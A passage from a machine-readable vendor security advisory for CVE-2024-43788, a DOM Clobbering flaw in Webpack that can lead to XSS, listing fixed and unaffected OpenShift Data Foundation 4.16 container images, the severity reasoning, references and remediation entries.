"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1_ppc64le", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd_amd64", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b_arm64", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea_ppc64le", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d_s390x", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d_amd64", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203_ppc64le", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9_s390x", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a_ppc64le", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996_amd64", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0_s390x", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231_ppc64le", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356_s390x", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388_amd64", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb_arm64", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e_ppc64le", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5_s390x", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6_ppc64le", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a_s390x", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2_ppc64le", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa_s390x", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2308193", }, ], notes: [ { category: "description", text: "A DOM Clobbering vulnerability was found in Webpack via `AutoPublicPathRuntimeModule`. DOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script through seemingly benign HTML markups in the webpage, for example, through a post or comment, and leverages the gadgets (pieces of JS code) living in the existing javascript code to transform it into executable code. This vulnerability can lead to Cross-site scripting (XSS) on websites that include Webpack-generated files and allow users to inject certain scriptless HTML tags with improperly sanitized name or ID attributes.", title: "Vulnerability description", }, { category: "summary", text: "webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule", title: "Vulnerability summary", }, { category: "other", text: "The severity of this issue is classified as moderate rather than important due to the specific conditions required for exploitation. DOM Clobbering, while serious, can only be leveraged in environments where an attacker has the ability to inject unsanitized HTML attributes (e.g., `name` or `id`) into a web page. This limits the attack surface to applications that improperly sanitize user input and rely on Webpack-generated files. Furthermore, the exploitation depends on existing vulnerabilities in the sanitization process, rather than the direct execution of arbitrary scripts. As a result, while the issue can lead to XSS, its impact is constrained by the contextual requirement of HTML injection, lowering its overall severity compared to more direct XSS vectors.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le", ], known_not_affected: [ "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d_ppc64le", "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5_amd64", "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c_s390x", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b_s390x", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1_amd64", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313_ppc64le", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87_amd64", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2_ppc64le", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2_arm64", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d_s390x", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141_s390x", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085_amd64", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81_amd64", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a_s390x", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7_amd64", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8_s390x", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8_arm64", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb_ppc64le", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825_s390x", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477_amd64", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81_amd64", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1_s390x", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c_ppc64le", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e_ppc64le", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f_arm64", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c_amd64", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13_s390x", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121_arm64", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c_s390x", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc_amd64", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac_ppc64le", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30_s390x", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920_ppc64le", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9_s390x", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0_arm64", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11_s390x", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235_arm64", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f_amd64", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64_amd64", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8_arm64", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a_amd64", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3_amd64", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a_ppc64le", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4_s390x", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57_arm64", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5_s390x", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1_ppc64le", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6_amd64", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a_amd64", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c_s390x", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1_ppc64le", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd_amd64", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b_arm64", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea_ppc64le", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d_s390x", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d_amd64", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203_ppc64le", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9_s390x", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a_ppc64le", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996_amd64", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0_s390x", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231_ppc64le", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356_s390x", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388_amd64", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb_arm64", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e_ppc64le", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5_s390x", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6_ppc64le", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a_s390x", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2_ppc64le", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa_s390x", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-43788", }, { category: "external", summary: "RHBZ#2308193", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2308193", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-43788", url: "https://www.cve.org/CVERecord?id=CVE-2024-43788", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-43788", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-43788", }, { category: "external", summary: "https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61", url: "https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61", }, { category: "external", summary: "https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986", url: "https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986", }, { category: "external", summary: "https://research.securitum.com/xss-in-amp4email-dom-clobbering", url: "https://research.securitum.com/xss-in-amp4email-dom-clobbering", }, { category: "external", summary: "https://scnps.co/papers/sp23_domclob.pdf", url: "https://scnps.co/papers/sp23_domclob.pdf", }, ], release_date: "2024-08-27T17:15:07.967000+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-15T08:52:38+00:00", details: "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:8113", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d_ppc64le", "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5_amd64", "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c_s390x", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b_s390x", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1_amd64", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313_ppc64le", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87_amd64", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2_ppc64le", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2_arm64", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d_s390x", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141_s390x", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085_amd64", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81_amd64", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a_s390x", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7_amd64", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8_s390x", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8_arm64", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb_ppc64le", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825_s390x", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477_amd64", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81_amd64", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1_s390x", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c_ppc64le", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e_ppc64le", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f_arm64", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c_amd64", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13_s390x", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121_arm64", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c_s390x", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc_amd64", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac_ppc64le", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64", 